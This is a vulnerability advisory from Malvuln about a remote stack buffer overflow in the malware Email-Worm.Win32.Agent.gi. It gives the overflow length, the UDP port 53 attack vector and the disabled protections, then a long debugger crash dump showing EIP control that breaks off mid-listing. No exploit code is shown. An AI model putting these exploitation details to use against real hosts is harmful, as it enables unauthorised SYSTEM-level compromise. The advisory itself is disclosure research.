Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/74e65773735f977185f6a09f1472ea46.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Email-Worm.Win32.Agent.gi Vulnerability: Remote Stack Buffer Overflow - (UDP Datagram) Description: Creates a service "Microsoft ASPI Manager" and listens on TCP ports 80, 81 and UDP 53. The service process is a dropped executable named aspimgr.exe that runs with SYSTEM integrity. Third party attackers can send 332 bytes to UDP port 53 to overwrite the instruction pointer (EIP) and possibly gain SYSTEM privileges. The Exploit PoC uses the typical 41414141 pattern and 52525252 "R" character for EIP overwrite. Type: PE32 MD5: 74e65773735f977185f6a09f1472ea46 Vuln ID: MVID-2021-0036 Dropped files: aspimgr.exe ASLR: False DEP: False Safe SEH: True Disclosure: 01/18/2021 Memory Dump: (1a78.e44): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=52525252 edx=773e9d70 esi=00000000 edi=00000000 eip=52525252 esp=03291450 ebp=03291470 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? 0:007> !exchain 03291464: ntdll!ExecuteHandler2+44 (773e9d70) 03291a14: ntdll!ExecuteHandler2+44 (773e9d70) 03291fc4: ntdll!ExecuteHandler2+44 (773e9d70) 03292574: ntdll!ExecuteHandler2+44 (773e9d70) 03292b24: ntdll!ExecuteHandler2+44 (773e9d70) 032930d4: ntdll!ExecuteHandler2+44 (773e9d70) 03293684: ntdll!ExecuteHandler2+44 (773e9d70) 03293c34: ntdll!ExecuteHandler2+44 (773e9d70) 032941e4: ntdll!ExecuteHandler2+44 (773e9d70) 03294794: ntdll!ExecuteHandler2+44 (773e9d70) 03294d44: ntdll!ExecuteHandler2+44 (773e9d70) 032952f4: ntdll!ExecuteHandler2+44 (773e9d70) 032958a4: ntdll!ExecuteHandler2+44 (773e9d70) 03295e54: ntdll!ExecuteHandler2+44 (773e9d70) 03296404: ntdll!ExecuteHandler2+44 (773e9d70) 032969b4: ntdll!ExecuteHandler2+44 (773e9d70) 03296f64: ntdll!ExecuteHandler2+44 (773e9d70) 03297514: ntdll!ExecuteHandler2+44 (773e9d70) 03297ac4: ntdll!ExecuteHandler2+44 (773e9d70) 03298074: ntdll!ExecuteHandler2+44 (773e9d70) 03298624: ntdll!ExecuteHandler2+44 (773e9d70) 03298bd4: ntdll!ExecuteHandler2+44 (773e9d70) 03299184: ntdll!ExecuteHandler2+44 (773e9d70) 03299734: ntdll!ExecuteHandler2+44 (773e9d70) 03299ce4: ntdll!ExecuteHandler2+44 (773e9d70) 0329a294: ntdll!ExecuteHandler2+44 (773e9d70) 0329a844: ntdll!ExecuteHandler2+44 (773e9d70) 0329adf4: ntdll!ExecuteHandler2+44 (773e9d70) 0329b3a4: ntdll!ExecuteHandler2+44 (773e9d70) 0329b954: ntdll!ExecuteHandler2+44 (773e9d70) 0329bf04: ntdll!ExecuteHandler2+44 (773e9d70) 0329c4b4: ntdll!ExecuteHandler2+44 (773e9d70) 0329ca64: ntdll!ExecuteHandler2+44 (773e9d70) 0329d014: ntdll!ExecuteHandler2+44 (773e9d70) 0329d5c4: ntdll!ExecuteHandler2+44 (773e9d70) 0329db74: ntdll!ExecuteHandler2+44 (773e9d70) 0329e124: ntdll!ExecuteHandler2+44 (773e9d70) 0329e6d4: ntdll!ExecuteHandler2+44 (773e9d70) 0329ec84: ntdll!ExecuteHandler2+44 (773e9d70) 0329f234: ntdll!ExecuteHandler2+44 (773e9d70) 0329f7e4: ntdll!ExecuteHandler2+44 (773e9d70) 0329fd94: ntdll!ExecuteHandler2+44 (773e9d70) 032a0344: ntdll!ExecuteHandler2+44 (773e9d70) 032a08f4: ntdll!ExecuteHandler2+44 (773e9d70) 032a0ea4: ntdll!ExecuteHandler2+44 (773e9d70) 032a1454: ntdll!ExecuteHandler2+44 (773e9d70) 032a1a04: ntdll!ExecuteHandler2+44 (773e9d70) 032a1fb4: ntdll!ExecuteHandler2+44 (773e9d70) 032a2564: ntdll!ExecuteHandler2+44 (773e9d70) 032a2b14: ntdll!ExecuteHandler2+44 (773e9d70) 032a30c4: ntdll!ExecuteHandler2+44 (773e9d70) 032a3674: ntdll!ExecuteHandler2+44 (773e9d70) 032a3c24: ntdll!ExecuteHandler2+44 (773e9d70) 032a41d4: ntdll!ExecuteHandler2+44 (773e9d70) 032a4784: ntdll!ExecuteHandler2+44 (773e9d70) 032a4d34: ntdll!ExecuteHandler2+44 (773e9d70) 032a52e4: ntdll!ExecuteHandler2+44 (773e9d70) 032a5894: ntdll!ExecuteHandler2+44 (773e9d70) 032a5e44: ntdll!ExecuteHandler2+44 (773e9d70) 032a63f4: ntdll!ExecuteHandler2+44 (773e9d70) 032a69a4: ntdll!ExecuteHandler2+44 (773e9d70) 032a6f54: ntdll!ExecuteHandler2+44 (773e9d70) 032a7504: ntdll!ExecuteHandler2+44 (773e9d70) 032a7ab4: ntdll!ExecuteHandler2+44 (773e9d70) 032a8064: ntdll!ExecuteHandler2+44 (773e9d70) 032a8614: ntdll!ExecuteHandler2+44 (773e9d70) 032a8bc4: ntdll!ExecuteHandler2+44 (773e9d70) 032a9174: ntdll!ExecuteHandler2+44 (773e9d70) 032a9724: ntdll!ExecuteHandler2+44 (773e9d70) 032a9cd4: ntdll!ExecuteHandler2+44 (773e9d70) 032aa284: ntdll!ExecuteHandler2+44 (773e9d70) 032aa834: ntdll!ExecuteHandler2+44 (773e9d70) 032aade4: ntdll!ExecuteHandler2+44 (773e9d70) 032ab394: ntdll!ExecuteHandler2+44 (773e9d70) 032ab944: ntdll!ExecuteHandler2+44 (773e9d70) 032abef4: ntdll!ExecuteHandler2+44 (773e9d70) 032ac4a4: ntdll!ExecuteHandler2+44 (773e9d70) 032aca54: ntdll!ExecuteHandler2+44 (773e9d70) 032ad004: ntdll!ExecuteHandler2+44 (773e9d70) 032ad5b4: ntdll!ExecuteHandler2+44 (773e9d70) 032adb64: ntdll!ExecuteHandler2+44 (773e9d70) 032ae114: ntdll!ExecuteHandler2+44 (773e9d70) 032ae6c4: ntdll!ExecuteHandler2+44 (773e9d70) 032aec74: ntdll!ExecuteHandler2+44 (773e9d70) 032af224: ntdll!ExecuteHandler2+44 (773e9d70) 032af7d4: ntdll!ExecuteHandler2+44 (773e9d70) 032afd84: ntdll!ExecuteHandler2+44 (773e9d70) 032b0334: ntdll!ExecuteHandler2+44 (773e9d70) 032b08e4: ntdll!ExecuteHandler2+44 (773e9d70) 032b0e94: ntdll!ExecuteHandler2+44 (773e9d70) 032b1444: ntdll!ExecuteHandler2+44 (773e9d70) 032b19f4: ntdll!ExecuteHandler2+44 (773e9d70) 032b1fa4: ntdll!ExecuteHandler2+44 (773e9d70) 032b2554: ntdll!ExecuteHandler2+44 (773e9d70) 032b2b04: ntdll!ExecuteHandler2+44 (773e9d70) 032b30b4: ntdll!ExecuteHandler2+44 (773e9d70) 032b3664: ntdll!ExecuteHandler2+44 (773e9d70) 032b3c14: ntdll!ExecuteHandler2+44 (773e9d70) 032b41c4: ntdll!ExecuteHandler2+44 (773e9d70) 032b4774: ntdll!ExecuteHandler2+44 (773e9d70) 032b4d24: ntdll!ExecuteHandler2+44 (773e9d70) 032b52d4: ntdll!ExecuteHandler2+44 (773e9d70) 032b5884: ntdll!ExecuteHandler2+44 (773e9d70) 032b5e34: ntdll!ExecuteHandler2+44 (773e9d70) 032b63e4: ntdll!ExecuteHandler2+44 (773e9d70) 032b6994: ntdll!ExecuteHandler2+44 (773e9d70) 032b6f44: ntdll!ExecuteHandler2+44 (773e9d70) 032b74f4: ntdll!ExecuteHandler2+44 (773e9d70) 032b7aa4: ntdll!ExecuteHandler2+44 (773e9d70) 032b8054: ntdll!ExecuteHandler2+44 (773e9d70) 032b8604: ntdll!ExecuteHandler2+44 (773e9d70) 032b8bb4: ntdll!ExecuteHandler2+44 (773e9d70) 032b9164: ntdll!ExecuteHandler2+44 (773e9d70) 032b9714: ntdll!ExecuteHandler2+44 (773e9d70) 032b9cc4: ntdll!ExecuteHandler2+44 (773e9d70) 032ba274: ntdll!ExecuteHandler2+44 (773e9d70) 032ba824: ntdll!ExecuteHandler2+44 (773e9d70) 032badd4: ntdll!ExecuteHandler2+44 (773e9d70) 032bb384: ntdll!ExecuteHandler2+44 (773e9d70) 032bb934: ntdll!ExecuteHandler2+44 (773e9d70) 032bbee4: ntdll!ExecuteHandler2+44 (773e9d70) 032bc494: ntdll!ExecuteHandler2+44 (773e9d70) 032bca44: ntdll!ExecuteHandler2+44 (773e9d70) 032bcff4: ntdll!ExecuteHandler2+44 (773e9d70) 032bd5a4: ntdll!ExecuteHandler2+44 (773e9d70) 032bdb54: ntdll!ExecuteHandler2+44 (773e9d70) 032be104: ntdll!ExecuteHandler2+44 (773e9d70) 032be6b4: ntdll!ExecuteHandler2+44 (773e9d70) 032bec64: ntdll!ExecuteHandler2+44 (773e9d70) 032bf214: ntdll!ExecuteHandler2+44 (773e9d70) 032bf7c4: ntdll!ExecuteHandler2+44 (773e9d70) 032bfd74: ntdll!ExecuteHandler2+44 (773e9d70) 032c0324: ntdll!ExecuteHandler2+44 (773e9d70) 032c08d4: ntdll!ExecuteHandler2+44 (773e9d70) 032c0e84: ntdll!ExecuteHandler2+44 (773e9d70) 032c1434: ntdll!ExecuteHandler2+44 (773e9d70) 032c19e4: ntdll!ExecuteHandler2+44 (773e9d70) 032c1f94: ntdll!ExecuteHandler2+44 (773e9d70) 032c2544: ntdll!ExecuteHandler2+44 (773e9d70) 032c2af4: ntdll!ExecuteHandler2+44 (773e9d70) 032c30a4: ntdll!ExecuteHandler2+44 (773e9d70) 032c3654: ntdll!ExecuteHandler2+44 (773e9d70) 032c3c04: ntdll!ExecuteHandler2+44 (773e9d70) 032c41b4: ntdll!ExecuteHandler2+44 (773e9d70) 032c4764: ntdll!ExecuteHandler2+44 (773e9d70) 032c4d14: ntdll!ExecuteHandler2+44 (773e9d70) 032c52c4: ntdll!ExecuteHandler2+44 (773e9d70) 032c5874: ntdll!ExecuteHandler2+44 (773e9d70) 032c5e24: ntdll!ExecuteHandler2+44 (773e9d70) 032c63d4: ntdll!ExecuteHandler2+44 (773e9d70) 032c6984: ntdll!ExecuteHandler2+44 (773e9d70) 032c6f34: ntdll!ExecuteHandler2+44 (773e9d70) 032c74e4: ntdll!ExecuteHandler2+44 (773e9d70) 032c7a94: ntdll!ExecuteHandler2+44 (773e9d70) 032c8044: ntdll!ExecuteHandler2+44 (773e9d70) 032c85f4: ntdll!ExecuteHandler2+44 (773e9d70) 032c8ba4: ntdll!ExecuteHandler2+44 (773e9d70) 032c9154: ntdll!ExecuteHandler2+44 (773e9d70) 032c9704: ntdll!ExecuteHandler2+44 (773e9d70) 032c9cb4: ntdll!ExecuteHandler2+44 (773e9d70) 032ca264: ntdll!ExecuteHandler2+44 (773e9d70) 032ca814: ntdll!ExecuteHandler2+44 (773e9d70) 032cadc4: ntdll!ExecuteHandler2+44 (773e9d70) 032cb374: ntdll!ExecuteHandler2+44 (773e9d70) 032cb924: ntdll!ExecuteHandler2+44 (773e9d70) 032cbed4: ntdll!ExecuteHandler2+44 (773e9d70) 032cc484: ntdll!ExecuteHandler2+44 (773e9d70) 032cca34: ntdll!ExecuteHandler2+44 (773e9d70) 032ccfe4: ntdll!ExecuteHandler2+44 (773e9d70) 032cd594: ntdll!ExecuteHandler2+44 (773e9d70) 032cdb44: ntdll!ExecuteHandler2+44 (773e9d70) 032ce0f4: ntdll!ExecuteHandler2+44 (773e9d70) 032ce6a4: ntdll!ExecuteHandler2+44 (773e9d70) 032cec54: ntdll!ExecuteHandler2+44 (773e9d70) 032cf204: ntdll!ExecuteHandler2+44 (773e9d70) 032cf7b4: ntdll!ExecuteHandler2+44 (773e9d70) 032cfd64: ntdll!ExecuteHandler2+44 (773e9d70) 032d0314: ntdll!ExecuteHandler2+44 (773e9d70) 032d08c4: ntdll!ExecuteHandler2+44 (773e9d70) 032d0e74: ntdll!ExecuteHandler2+44 (773e9d70) 032d1424: ntdll!ExecuteHandler2+44 (773e9d70) 032d19d4: ntdll!ExecuteHandler2+44 (773e9d70) 032d1f84: ntdll!ExecuteHandler2+44 (773e9d70) 032d2534: ntdll!ExecuteHandler2+44 (773e9d70) 032d2ae4: ntdll!ExecuteHandler2+44 (773e9d70) 032d3094: ntdll!ExecuteHandler2+44 (773e9d70) 032d3644: ntdll!ExecuteHandler2+44 (773e9d70) 032d3bf4: ntdll!ExecuteHandler2+44 (773e9d70) 032d41a4: ntdll!ExecuteHandler2+44 (773e9d70) 032d4754: ntdll!ExecuteHandler2+44 (773e9d70) 032d4d04: ntdll!ExecuteHandler2+44 (773e9d70) 032d52b4: ntdll!ExecuteHandler2+44 (773e9d70) 032d5864: ntdll!ExecuteHandler2+44 (773e9d70) 032d5e14: ntdll!ExecuteHandler2+44 (773e9d70) 032d63c4: ntdll!ExecuteHandler2+44 (773e9d70) 032d6974: ntdll!ExecuteHandler2+44 (773e9d70) 032d6f24: ntdll!ExecuteHandler2+44 (773e9d70) 032d74d4: ntdll!ExecuteHandler2+44 (773e9d70) 032d7a84: ntdll!ExecuteHandler2+44 (773e9d70) 032d8034: ntdll!ExecuteHandler2+44 (773e9d70) 032d85e4: ntdll!ExecuteHandler2+44 (773e9d70) 032d8b94: ntdll!ExecuteHandler2+44 (773e9d70) 032d9144: ntdll!ExecuteHandler2+44 (773e9d70) 032d96f4: ntdll!ExecuteHandler2+44 (773e9d70) 032d9ca4: ntdll!ExecuteHandler2+44 (773e9d70) 032da254: ntdll!ExecuteHandler2+44 (773e9d70) 032da804: ntdll!ExecuteHandler2+44 (773e9d70) 032dadb4: ntdll!ExecuteHandler2+44 (773e9d70) 032db364: ntdll!ExecuteHandler2+44 (773e9d70) 032db914: ntdll!ExecuteHandler2+44 (773e9d70) 032dbec4: ntdll!ExecuteHandler2+44 (773e9d70) 032dc474: ntdll!ExecuteHandler2+44 (773e9d70) 032dca24: ntdll!ExecuteHandler2+44 (773e9d70) 032dcfd4: ntdll!ExecuteHandler2+44 (773e9d70) 032dd584: ntdll!ExecuteHandler2+44 (773e9d70) 032ddb34: ntdll!ExecuteHandler2+44 (773e9d70) 032de0e4: ntdll!ExecuteHandler2+44 (773e9d70) 032de694: ntdll!ExecuteHandler2+44 (773e9d70) 032dec44: ntdll!ExecuteHandler2+44 (773e9d70) 032df1f4: ntdll!ExecuteHandler2+44 (773e9d70) 032df7a4: ntdll!ExecuteHandler2+44 (773e9d70) 032dfd54: ntdll!ExecuteHandler2+44 (773e9d70) 032e0304: ntdll!ExecuteHandler2+44 (773e9d70) 032e08b4: ntdll!ExecuteHandler2+44 (773e9d70) 032e0e64: ntdll!ExecuteHandler2+44 (773e9d70) 032e1414: ntdll!ExecuteHandler2+44 (773e9d70) 032e19c4: ntdll!ExecuteHandler2+44 (773e9d70) 032e1f74: ntdll!ExecuteHandler2+44 (773e9d70) 032e2524: ntdll!ExecuteHandler2+44 (773e9d70) 032e2ad4: ntdll!ExecuteHandler2+44 (773e9d70) 032e3084: ntdll!ExecuteHandler2+44 (773e9d70) 032e3634: ntdll!ExecuteHandler2+44 (773e9d70) 032e3be4: ntdll!ExecuteHandler2+44 (773e9d70) 032e4194: ntdll!ExecuteHandler2+44 (773e9d70) 032e4744: ntdll!ExecuteHandler2+44 (773e9d70) 032e4cf4: ntdll!ExecuteHandler2+44 (773e9d70) 032e52a4: ntdll!ExecuteHandler2+44 (773e9d70) 032e5854: ntdll!ExecuteHandler2+44 (773e9d70) 032e5e04: ntdll!ExecuteHandler2+44 (773e9d70) 032e63b4: ntdll!ExecuteHandler2+44 (773e9d70) 032e6964: ntdll!ExecuteHandler2+44 (773e9d70) 032e6f14: ntdll!ExecuteHandler2+44 (773e9d70) 032e74c4: ntdll!ExecuteHandler2+44 (773e9d70) 032e7a74: ntdll!ExecuteHandler2+44 (773e9d70) 032e8024: ntdll!ExecuteHandler2+44 (773e9d70) 032e85d4: ntdll!ExecuteHandler2+44 (773e9d70) 032e8b84: ntdll!ExecuteHandler2+44 (773e9d70) 032e9134: ntdll!ExecuteHandler2+44 (773e9d70) 032e96e4: ntdll!ExecuteHandler2+44 (773e9d70) 032e9c94: ntdll!ExecuteHandler2+44 (773e9d70) 032ea244: ntdll!ExecuteHandler2+44 (773e9d70) 032ea7f4: ntdll!ExecuteHandler2+44 (773e9d70) 032eada4: ntdll!ExecuteHandler2+44 (773e9d70) 032eb354: ntdll!ExecuteHandler2+44 (773e9d70) 032eb904: ntdll!ExecuteHandler2+44 (773e9d70) 032ebeb4: ntdll!ExecuteHandler2+44 (773e9d70) 032ec464: ntdll!ExecuteHandler2+44 (773e9d70) 032eca14: ntdll!ExecuteHandler2+44 (773e9d70) 032ecfc4: ntdll!ExecuteHandler2+44 (773e9d70) 032ed574: ntdll!ExecuteHandler2+44 (773e9d70) 032edb24: ntdll!ExecuteHandler2+44 (773e9d70) 032ee0d4: ntdll!ExecuteHandler2+44 (773e9d70) 032ee684: ntdll!ExecuteHandler2+44 (773e9d70) 032eec34: ntdll!ExecuteHandler2+44 (773e9d70) 032ef1e4: ntdll!ExecuteHandler2+44 (773e9d70) 032ef794: ntdll!ExecuteHandler2+44 (773e9d70) 032efd44: ntdll!ExecuteHandler2+44 (773e9d70) 032f02f4: ntdll!ExecuteHandler2+44 (773e9d70) 032f08a4: ntdll!ExecuteHandler2+44 (773e9d70) 032f0e54: ntdll!ExecuteHandler2+44 (773e9d70) 032f1404: ntdll!ExecuteHandler2+44 (773e9d70) 032f19b4: ntdll!ExecuteHandler2+44 (773e9d70) 032f1f64: ntdll!ExecuteHandler2+44 (773e9d70) 032f2514: ntdll!ExecuteHandler2+44 (773e9d70) 032f2ac4: ntdll!ExecuteHandler2+44 (773e9d70) 032f3074: ntdll!ExecuteHandler2+44 (773e9d70) 032f3624: ntdll!ExecuteHandler2+44 (773e9d70) 032f3bd4: ntdll!ExecuteHandler2+44 (773e9d70) 032f4184: ntdll!ExecuteHandler2+44 (773e9d70) 032f4734: ntdll!ExecuteHandler2+44 (773e9d70) 032f4ce4: ntdll!ExecuteHandler2+44 (773e9d70) 032f5294: ntdll!ExecuteHandler2+44 (773e9d70) 032f5844: ntdll!ExecuteHandler2+44 (773e9d70) 032f5df4: ntdll!ExecuteHandler2+44 (773e9d70) 032f63a4: ntdll!ExecuteHandler2+44 (773e9d70) 032f6954: ntdll!ExecuteHandler2+44 (773e9d70) 032f6f04: ntdll!ExecuteHandler2+44 (773e9d70) 032f74b4: ntdll!ExecuteHandler2+44 (773e9d70) 032f7a64: ntdll!ExecuteHandler2+44 (773e9d70) 032f8014: ntdll!ExecuteHandler2+44 (773e9d70) 032f85c4: ntdll!ExecuteHandler2+44 (773e9d70) 032f8b74: ntdll!ExecuteHandler2+44 (773e9d70) 032f9124: ntdll!ExecuteHandler2+44 (773e9d70) 032f96d4: ntdll!ExecuteHandler2+44 (773e9d70) 032f9c84: ntdll!ExecuteHandler2+44 (773e9d70) 032fa234: ntdll!ExecuteHandler2+44 (773e9d70) 032fa7e4: ntdll!ExecuteHandler2+44 (773e9d70) 032fad94: ntdll!ExecuteHandler2+44 (773e9d70) 032fb344: ntdll!ExecuteHandler2+44 (773e9d70) 032fb8f4: ntdll!ExecuteHandler2+44 (773e9d70) 032fbea4: ntdll!ExecuteHandler2+44 (773e9d70) 032fc454: ntdll!ExecuteHandler2+44 (773e9d70) 032fca04: ntdll!ExecuteHandler2+44 (773e9d70) 032fcfb4: ntdll!ExecuteHandler2+44 (773e9d70) 032fd564: ntdll!ExecuteHandler2+44 (773e9d70) 032fdb14: ntdll!ExecuteHandler2+44 (773e9d70) 032fe0c4: ntdll!ExecuteHandler2+44 (773e9d70) 032fe674: ntdll!ExecuteHandler2+44 (773e9d70) 032fec24: ntdll!ExecuteHandler2+44 (773e9d70) 032ff1d4: ntdll!ExecuteHandler2+44 (773e9d70) 032ff784: ntdll!ExecuteHandler2+44 (773e9d70) 032ffd34: ntdll!ExecuteHandler2+44 (773e9d70) 033002e4: ntdll!ExecuteHandler2+44 (773e9d70) 03300894: ntdll!ExecuteHandler2+44 (773e9d70) 03300e44: ntdll!ExecuteHandler2+44 (773e9d70) 033013f4: ntdll!ExecuteHandler2+44 (773e9d70) 033019a4: ntdll!ExecuteHandler2+44 (773e9d70) 03301f54: ntdll!ExecuteHandler2+44 (773e9d70) 03302504: ntdll!ExecuteHandler2+44 (773e9d70) 03302ab4: ntdll!ExecuteHandler2+44 (773e9d70) 03303064: ntdll!ExecuteHandler2+44 (773e9d70) 03303614: ntdll!ExecuteHandler2+44 (773e9d70) 03303bc4: ntdll!ExecuteHandler2+44 (773e9d70) 03304174: ntdll!ExecuteHandler2+44 (773e9d70) 03304724: ntdll!ExecuteHandler2+44 (773e9d70) 03304cd4: ntdll!ExecuteHandler2+44 (773e9d70) 03305284: ntdll!ExecuteHandler2+44 (773e9d70) 03305834: ntdll!ExecuteHandler2+44 (773e9d70) 03305de4: ntdll!ExecuteHandler2+44 (773e9d70) 03306394: ntdll!ExecuteHandler2+44 (773e9d70) 03306944: ntdll!ExecuteHandler2+44 (773e9d70) 03306ef4: ntdll!ExecuteHandler2+44 (773e9d70) 033074a4: ntdll!ExecuteHandler2+44 (773e9d70) 03307a54: ntdll!ExecuteHandler2+44 (773e9d70) 03308004: ntdll!ExecuteHandler2+44 (773e9d70) 033085b4: ntdll!ExecuteHandler2+44 (773e9d70) 03308b64: ntdll!ExecuteHandler2+44 (773e9d70) 03309114: ntdll!ExecuteHandler2+44 (773e9d70) 033096c4: ntdll!ExecuteHandler2+44 (773e9d70) 03309c74: ntdll!ExecuteHandler2+44 (773e9d70) 0330a224: ntdll!ExecuteHandler2+44 (773e9d70) 0330a7d4: ntdll!ExecuteHandler2+44 (773e9d70) 0330ad84: ntdll!ExecuteHandler2+44 (773e9d70) 0330b334: ntdll!ExecuteHandler2+44 (773e9d70) 0330b8e4: ntdll!ExecuteHandler2+44 (773e9d70) 0330be94: ntdll!ExecuteHandler2+44 (773e9d70) 0330c444: ntdll!ExecuteHandler2+44 (773e9d70) 0330c9f4: ntdll!ExecuteHandler2+44 (773e9d70) 0330cfa4: ntdll!ExecuteHandler2+44 (773e9d70) 0330d554: ntdll!ExecuteHandler2+44 (773e9d70) 0330db04: ntdll!ExecuteHandler2+44 (773e9d70) 0330e0b4: ntdll!ExecuteHandler2+44 (773e9d70) 0330e664: ntdll!ExecuteHandler2+44 (773e9d70) 0330ec14: ntdll!ExecuteHandler2+44 (773e9d70) 0330f1c4: ntdll!ExecuteHandler2+44 (773e9d70) 0330f774: ntdll!ExecuteHandler2+44 (773e9d70) 0330fd24: ntdll!ExecuteHandler2+44 (773e9d70) 033102d4: ntdll!ExecuteHandler2+44 (773e9d70) 03310884: ntdll!ExecuteHandler2+44 (773e9d70) 03310e34: ntdll!ExecuteHandler2+44 (773e9d70) 033113e4: ntdll!ExecuteHandler2+44 (773e9d70) 03311994: ntdll!ExecuteHandler2+44 (773e9d70) 03311f44: ntdll!ExecuteHandler2+44 (773e9d70) 033124f4: ntdll!ExecuteHandler2+44 (773e9d70) 03312aa4: ntdll!ExecuteHandler2+44 (773e9d70) 03313054: ntdll!ExecuteHandler2+44 (773e9d70) 03313604: ntdll!ExecuteHandler2+44 (773e9d70) 03313bb4: ntdll!ExecuteHandler2+44 (773e9d70) 03314164: ntdll!ExecuteHandler2+44 (773e9d70) 03314714: ntdll!ExecuteHandler2+44 (773e9d70) 03314cc4: ntdll!ExecuteHandler2+44 (773e9d70) 03315274: ntdll!ExecuteHandler2+44 (773e9d70) 03315824: ntdll!ExecuteHandler2+44 (773e9d70) 03315dd4: ntdll!ExecuteHandler2+44 (773e9d70) 03316384: ntdll!ExecuteHandler2+44 (773e9d70) 03316934: ntdll!ExecuteHandler2+44 (773e9d70) 03316ee4: ntdll!ExecuteHandler2+44 (773e9d70) 03317494: ntdll!ExecuteHandler2+44 (773e9d70) 03317a44: ntdll!ExecuteHandler2+44 (773e9d70) 03317ff4: ntdll!ExecuteHandler2+44 (773e9d70) 033185a4: ntdll!ExecuteHandler2+44 (773e9d70) 03318b54: ntdll!ExecuteHandler2+44 (773e9d70) 03319104: ntdll!ExecuteHandler2+44 (773e9d70) 033196b4: ntdll!ExecuteHandler2+44 (773e9d70) 03319c64: ntdll!ExecuteHandler2+44 (773e9d70) 0331a214: ntdll!ExecuteHandler2+44 (773e9d70) 0331a7c4: ntdll!ExecuteHandler2+44 (773e9d70) 0331ad74: ntdll!ExecuteHandler2+44 (773e9d70) 0331b324: ntdll!ExecuteHandler2+44 (773e9d70) 0331b8d4: ntdll!ExecuteHandler2+44 (773e9d70) 0331be84: ntdll!ExecuteHandler2+44 (773e9d70) 0331c434: ntdll!ExecuteHandler2+44 (773e9d70) 0331c9e4: ntdll!ExecuteHandler2+44 (773e9d70) 0331cf94: ntdll!ExecuteHandler2+44 (773e9d70) 0331d544: ntdll!ExecuteHandler2+44 (773e9d70) 0331daf4: ntdll!ExecuteHandler2+44 (773e9d70) 0331e0a4: ntdll!ExecuteHandler2+44 (773e9d70) 0331e654: ntdll!ExecuteHandler2+44 (773e9d70) 0331ec04: ntdll!ExecuteHandler2+44 (773e9d70) 0331f1b4: ntdll!ExecuteHandler2+44 (773e9d70) 0331f764: ntdll!ExecuteHandler2+44 (773e9d70) 0331fd14: ntdll!ExecuteHandler2+44 (773e9d70) 033202c4: ntdll!ExecuteHandler2+44 (773e9d70) 03320874: ntdll!ExecuteHandler2+44 (773e9d70) 03320e24: ntdll!ExecuteHandler2+44 (773e9d70) 033213d4: ntdll!ExecuteHandler2+44 (773e9d70) 03321984: ntdll!ExecuteHandler2+44 (773e9d70) 03321f34: ntdll!ExecuteHandler2+44 (773e9d70) 033224e4: ntdll!ExecuteHandler2+44 (773e9d70) 03322a94: ntdll!ExecuteHandler2+44 (773e9d70) 03323044: ntdll!ExecuteHandler2+44 (773e9d70) 033235f4: ntdll!ExecuteHandler2+44 (773e9d70) 03323ba4: ntdll!ExecuteHandler2+44 (773e9d70) 03324154: ntdll!ExecuteHandler2+44 (773e9d70) 03324704: ntdll!ExecuteHandler2+44 (773e9d70) 03324cb4: ntdll!ExecuteHandler2+44 (773e9d70) 03325264: ntdll!ExecuteHandler2+44 (773e9d70) 03325814: ntdll!ExecuteHandler2+44 (773e9d70) 03325dc4: ntdll!ExecuteHandler2+44 (773e9d70) 03326374: ntdll!ExecuteHandler2+44 (773e9d70) 03326924: ntdll!ExecuteHandler2+44 (773e9d70) 03326ed4: ntdll!ExecuteHandler2+44 (773e9d70) 03327484: ntdll!ExecuteHandler2+44 (773e9d70) 03327a34: ntdll!ExecuteHandler2+44 (773e9d70) 03327fe4: ntdll!ExecuteHandler2+44 (773e9d70) 03328594: ntdll!ExecuteHandler2+44 (773e9d70) 03328b44: ntdll!ExecuteHandler2+44 (773e9d70) 033290f4: ntdll!ExecuteHandler2+44 (773e9d70) 033296a4: ntdll!ExecuteHandler2+44 (773e9d70) 03329c54: ntdll!ExecuteHandler2+44 (773e9d70) 0332a204: ntdll!ExecuteHandler2+44 (773e9d70) 0332a7b4: ntdll!ExecuteHandler2+44 (773e9d70) 0332ad64: ntdll!ExecuteHandler2+44 (773e9d70) 0332b314: ntdll!ExecuteHandler2+44 (773e9d70) 0332b8c4: ntdll!ExecuteHandler2+44 (773e9d70) 0332be74: ntdll!ExecuteHandler2+44 (773e9d70) 0332c424: ntdll!ExecuteHandler2+44 (773e9d70) 0332c9d4: ntdll!ExecuteHandler2+44 (773e9d70) 0332cf84: ntdll!ExecuteHandler2+44 (773e9d70) 0332d534: ntdll!ExecuteHandler2+44 (773e9d70) 0332dae4: ntdll!ExecuteHandler2+44 (773e9d70) 0332e094: ntdll!ExecuteHandler2+44 (773e9d70) 0332e644: ntdll!ExecuteHandler2+44 (773e9d70) 0332ebf4: ntdll!ExecuteHandler2+44 (773e9d70) 0332f1a4: ntdll!ExecuteHandler2+44 (773e9d70) 0332f754: ntdll!ExecuteHandler2+44 (773e9d70) 0332fd04: ntdll!ExecuteHandler2+44 (773e9d70) 033302b4: ntdll!ExecuteHandler2+44 (773e9d70) 03330864: ntdll!ExecuteHandler2+44 (773e9d70) 03330e14: ntdll!ExecuteHandler2+44 (773e9d70) 033313c4: ntdll!ExecuteHandler2+44 (773e9d70) 03331974: ntdll!ExecuteHandler2+44 (773e9d70) 03331f24: ntdll!ExecuteHandler2+44 (773e9d70) 033324d4: ntdll!ExecuteHandler2+44 (773e9d70) 03332a84: ntdll!ExecuteHandler2+44 (773e9d70) 03333034: ntdll!ExecuteHandler2+44 (773e9d70) 033335e4: ntdll!ExecuteHandler2+44 (773e9d70) 03333b94: ntdll!ExecuteHandler2+44 (773e9d70) 03334144: ntdll!ExecuteHandler2+44 (773e9d70) 033346f4: ntdll!ExecuteHandler2+44 (773e9d70) 03334ca4: ntdll!ExecuteHandler2+44 (773e9d70) 03335254: ntdll!ExecuteHandler2+44 (773e9d70) 03335804: ntdll!ExecuteHandler2+44 (773e9d70) 03335db4: ntdll!ExecuteHandler2+44 (773e9d70) 03336364: ntdll!ExecuteHandler2+44 (773e9d70) 03336914: ntdll!ExecuteHandler2+44 (773e9d70) 03336ec4: ntdll!ExecuteHandler2+44 (773e9d70) 03337474: ntdll!ExecuteHandler2+44 (773e9d70) 03337a24: ntdll!ExecuteHandler2+44 (773e9d70) 03337fd4: ntdll!ExecuteHandler2+44 (773e9d70) 03338584: ntdll!ExecuteHandler2+44 (773e9d70) 03338b34: ntdll!ExecuteHandler2+44 (773e9d70) 033390e4: ntdll!ExecuteHandler2+44 (773e9d70) 03339694: 